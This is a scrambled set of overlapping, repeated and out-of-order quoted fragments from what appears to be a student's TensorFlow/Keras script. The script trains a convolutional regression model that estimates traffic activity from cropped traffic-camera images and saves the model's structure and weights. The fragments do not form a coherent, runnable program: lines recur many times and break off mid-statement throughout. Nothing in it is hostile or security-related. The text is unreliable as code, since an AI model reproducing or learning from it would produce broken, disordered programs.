tf.keras.utils.to_categorical(y_test, 16) y_train = y_train /", "activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10,", "tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file)", "model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\"))", "= tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down", "#model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary()", "view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid =", "= img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor", "y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test =", "Read in and preprocess a batch of images sess = tf.Session() for i", "= tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test / 16", "It is loosely based on TF image classification examples and \"Deep Leaning: Image", "TF image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" #", "sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] +", "Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32)", "python file trains a neural network that predicts an activity level based on", "a batch of images sess = tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]])", "np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x,", "data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert", "x, y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train,", "#y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same',", "tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x =", "#y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test /", "# view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid", "model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0,", "tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw)", "/ 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test =", "metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #,", "import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file", "normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with", "3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten())", "model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5))", ") model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 )", "index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y", "= tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255", "#print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from", "an initial attempt at doing regression based on image data. It is loosely", "16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test = y_test", "255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess =", "img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor =", "#x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10)", "import tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring", "#print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape)", "Recognition\" on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df =", "/ 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train", "padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3),", "data. It is loosely based on TF image classification examples and \"Deep Leaning:", "tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file", "# print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\",", "loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test],", "ELEN-E6889, Spring 2019 Final Project This python file trains a neural network that", "tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array,", "model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160,", "160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in", "= y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test", "np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read", "#x_train = x_train / 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train,", "\"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid)", "#print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file =", "= tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw = tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor =", "model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512,", "[0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array", "16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train =", "tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a", "255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test,", "#y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3)))", "(x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train /", "from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape)", "print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval() #print(\"np", "pd from sklearn import model_selection import tensorflow as tf from pathlib import Path", "model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\"))", "image to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]]", "# normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session()", "#y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16", "for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y", "an activity level based on a jpg image from a traffic camera This", "img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it", "10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32,", "predicts an activity level based on a jpg image from a traffic camera", "tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor =", "# convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path", "as np import pandas as pd from sklearn import model_selection import tensorflow as", "model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu'))", "trains a neural network that predicts an activity level based on a jpg", "Image Recognition\" on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\" df", "= tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor)", "tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3)))", "y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f =", "activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"]", "file trains a neural network that predicts an activity level based on a", "activity level based on a jpg image from a traffic camera This is", "squish it down a bit img_tensor /= 255.0 # normalize to [0,1] range", "\"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains a", "32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3),", "sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df,", "= tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor", "= img_tensor.eval() #print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor", "traffic camera This is an initial attempt at doing regression based on image", "on TF image classification examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\"", "#print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3],", "\"\"\" # view sample image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train,", "y x_train, y_train = keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16)", "activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train,", "image img_path = \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1)", "= x_train / 255 #x_test = x_test / 255 #y_train = tf.keras.utils.to_categorical(y_train, 10)", "img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image =", "= tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3),", "#file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor = tf.image.resize(img_tensor, [240, 240])", "= keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train", "= y_value # convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file", "#print(x.shape) #print(y.shape) # Read in and preprocess a batch of images sess =", "input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2))", "model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy',", "from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This", "a bit img_tensor /= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape)", "#img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor /=", "attempt at doing regression based on image data. It is loosely based on", "is loosely based on TF image classification examples and \"Deep Leaning: Image Recognition\"", "at doing regression based on image data. It is loosely based on TF", "#x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test =", "camera This is an initial attempt at doing regression based on image data.", "Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image img_path = \"./labeled_data/\"", "#print(\"x shape\", x.shape) #print(y.shape) return x, y x_train, y_train = keras_data(df_train) x_test, y_test", "batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure =", "[240, 240]) # squish it down a bit img_tensor /= 255.0 # normalize", "initial attempt at doing regression based on image data. It is loosely based", "df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def", "range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value])", "y[i] = y_value # convert image to a tensor # img_raw = tf.read_file(sample_img_path)", "#(x_train, y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train =", "based on a jpg image from a traffic camera This is an initial", "# print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess = tf.Session() with sess.as_default(): np_array = img_tensor.eval()", "model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile(", "and preprocess a batch of images sess = tf.Session() for i in range(0,", "tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test, 16) y_train = y_train / 16 y_test =", "in and preprocess a batch of images sess = tf.Session() for i in", "sklearn import model_selection import tensorflow as tf from pathlib import Path \"\"\" <NAME>,", "image data. It is loosely based on TF image classification examples and \"Deep", "model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30,", "= tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential() #model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu',", "x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test /", "x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape)", "160]) #img_tensor = tf.image.resize(img_tensor, [240, 240]) # squish it down a bit img_tensor", "data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i]", "import pandas as pd from sklearn import model_selection import tensorflow as tf from", "np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch of images", "#print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160, 160]) #img_tensor", "model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10,", "WAK2116, ELEN-E6889, Spring 2019 Final Project This python file trains a neural network", "= model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays x =", "= x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test", "# save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) # save weights", "y_value = data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value", "pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019 Final Project This python", "/ 255 #y_train = tf.keras.utils.to_categorical(y_train, 10) #y_test = tf.keras.utils.to_categorical(y_test, 10) model = tf.keras.Sequential()", "padding='same', activation='relu', input_shape=(32, 32, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), padding='same', activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu'))", "jpg image from a traffic camera This is an initial attempt at doing", "examples and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image", "arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y = np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape)", "def keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y", "keras_data(data): # Output arrays x = np.empty([0, 160, 160, 3], dtype=np.float32) y =", "#loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test,", "/= 255.0 # normalize to [0,1] range # print(img_tensor) #print(img_tensor.shape) # print(img_tensor.dtype) sess", "model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu'))", "activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\"))", "= np.empty([data.datetime.count()], dtype=np.float32) #print(x.shape) #print(y.shape) # Read in and preprocess a batch of", "data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value # convert image to", "tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116, ELEN-E6889, Spring 2019", "x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return x, y x_train,", "= keras_data(df_train) x_test, y_test = keras_data(df_valid) #y_train = tf.keras.utils.to_categorical(y_train, 16) #y_test = tf.keras.utils.to_categorical(y_test,", "x_train, y_train, batch_size=10, epochs=30, validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure", "#x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test / 255", "#steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) #", "\"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image img_path =", "y_train), (x_test,y_test) = tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train", "= x_test.astype(\"float32\") #x_train = x_train / 255 #x_test = x_test / 255 #y_train", "import numpy as np import pandas as pd from sklearn import model_selection import", "#print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape) #output_image", "doing regression based on image data. It is loosely based on TF image", "2019 Final Project This python file trains a neural network that predicts an", "16) y_train = y_train / 16 y_test = y_test / 16 #(x_train, y_train),", "160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor, [160,", "model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] )", "activation='relu', input_shape=(160, 160, 3))) model.add(tf.keras.layers.Conv2D(32,(3,3), activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Conv2D(64,(3,3), padding='same', activation='relu')) model.add(tf.keras.layers.Conv2D(64,(3,3), activation='relu'))", "and \"Deep Leaning: Image Recognition\" on Lynda.com \"\"\" # view sample image img_path", "# Read in and preprocess a batch of images sess = tf.Session() for", "convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path +", "activation='relu')) model.add(tf.keras.layers.MaxPooling2D(2,2)) model.add(tf.keras.layers.Dropout(0.25)) model.add(tf.keras.layers.Flatten()) model.add(tf.keras.layers.Dense(512, activation=\"relu\")) model.add(tf.keras.layers.Dropout(0.5)) model.add(tf.keras.layers.Dense(100, activation='relu')) model.add(tf.keras.layers.Dropout(.25)) #model.add(tf.keras.layers.Dense(10, activation=\"softmax\")) model.add(tf.keras.layers.Dense(10,", "validation_data=[x_test, y_test], shuffle=True #, #steps_per_epoch=1000 ) # save structure model_structure = model.to_json() f", "= \"./labeled_data/\" df = pd.read_csv('./labeled_data/labels.txt') #print(df) df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\")", "df_train, df_valid = model_selection.train_test_split(df, test_size=.1) #print(df_train) #print(\"---\") #print(df_valid) def keras_data(data): # Output arrays", "80, 160, 220) #print(cropped_tensor.shape) #output_image = tf.image.encode_png(cropped_tensor) #file = tf.write_file(\"text.png\",output_image) img_tensor = tf.image.resize(cropped_tensor,", "a tensor # img_raw = tf.read_file(sample_img_path) image_file = img_path + data.datetime[data.index[i]] img_raw =", "= tf.Session() for i in range(0, data.datetime.count()): #print(data.people[data.index[i]]) y_value = data.vehicles[data.index[i]] + data.people[data.index[i]]", "= data.vehicles[data.index[i]] + data.people[data.index[i]] #print(y_value) #y = np.append(y, [y_value]) y[i] = y_value #", "#print(\"np from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape)", "np import pandas as pd from sklearn import model_selection import tensorflow as tf", "np.append(y, [y_value]) y[i] = y_value # convert image to a tensor # img_raw", "= np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0)", "tf.read_file(image_file) #print(repr(img_raw)[:200]+\"...\") img_tensor = tf.image.decode_image(img_raw) #print(img_tensor.shape) cropped_tensor = tf.image.crop_to_bounding_box(img_tensor,80, 80, 160, 220) #print(cropped_tensor.shape)", "based on image data. It is loosely based on TF image classification examples", "model.add(tf.keras.layers.Dense(10, activation=\"relu\")) model.add(tf.keras.layers.Dense(1)) model.compile( #loss='categorical_crossentropy', loss='mse', optimizer='adam', metrics=[\"accuracy\", \"mae\"] ) model.summary() model.fit( x_train,", "y_train = y_train / 16 y_test = y_test / 16 #(x_train, y_train), (x_test,y_test)", "y_value # convert image to a tensor # img_raw = tf.read_file(sample_img_path) image_file =", "save structure model_structure = model.to_json() f = Path(\"model_structure.json\") f.write_text(model_structure) # save weights model.save_weights(\"model_weights.h5\")", "tensor with index\",indexed_array.shape) x = np.append(x, indexed_array, axis=0) #print(\"x shape\", x.shape) #print(y.shape) return", "tf.keras.datasets.cifar10.load_data() #x_train = x_train.astype(\"float32\") #x_test = x_test.astype(\"float32\") #x_train = x_train / 255 #x_test", "from tensor\", np_array.shape) indexed_array = np.expand_dims(np_array, axis=0) #print(\"np from tensor with index\",indexed_array.shape) x", "import model_selection import tensorflow as tf from pathlib import Path \"\"\" <NAME>, WAK2116,", "img_tensor /= 